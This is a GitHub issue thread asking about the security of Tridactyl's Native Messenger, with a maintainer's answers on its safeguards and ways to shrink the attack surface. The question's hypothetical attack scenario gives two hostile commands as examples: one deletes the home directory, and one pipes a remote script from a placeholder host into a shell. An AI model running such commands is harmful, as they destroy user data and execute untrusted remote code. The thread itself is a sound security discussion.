### ISSUE TITLE
How secure is Native Messenger?

### ISSUE THREAD

**Issue by YodaEmbedding** [tridactyl/tridactyl#3102]
In particular, Native Messenger allows the `!` command to run arbitrary shell scripts on the system.

 - Could visiting a webpage allow it to run arbitrary code on your PC?
 - If not, are there other sources which may run arbitrary code?
 - Is there a way to reduce the attack surface?
 - Can we disable arbitrary command execution (in such a way that it cannot be reenabled from within Firefox) and only allow "safe" features such as text-editing with `vim` or `mpv`?

In theory, I could I visit some disgruntled developer's personal webpage, and be greeted with a `! rm -rf ~` or `! curl -sL example.com/virus.sh | sh`, which they put in place to "teach those darn tridactyl users a lesson about security"?

**Comment by bovine3dom** [comment]
1) Tridactyl protects you from this in two ways: the command line is in an isolated iframe to which the page does not have access; and Tridactyl only accepts key events which Firefox says are real and not generated by the page. However, Tridactyl could have bugs in it. Installing the native messenger means that those bugs could cause far greater problems.

2) the user is free to run arbitrary code; it is quite possible to circumvent both of these safeguards by, e.g. piping page content directly to the native messenger. `:updatenative` runs code from this repository to update the messenger each time Tridactyl is updated. It can be disabled via `set nativeupdatecmd echo` or something similar.

3) don't install the native messenger, or ensure that you pipe untrusted page content through `:shellescape`, or don't visit untrusted pages.

4) if you disable `:updatenative` you are free to edit the native messenger as you please (it's just Python). You could change it so that anything that didn't start with vim or MPV was a no-op (although I believe it's possible to execute anything from vim so I'm not sure that would make much sense).

**Comment by bovine3dom** [comment]
Closing as answered, I think
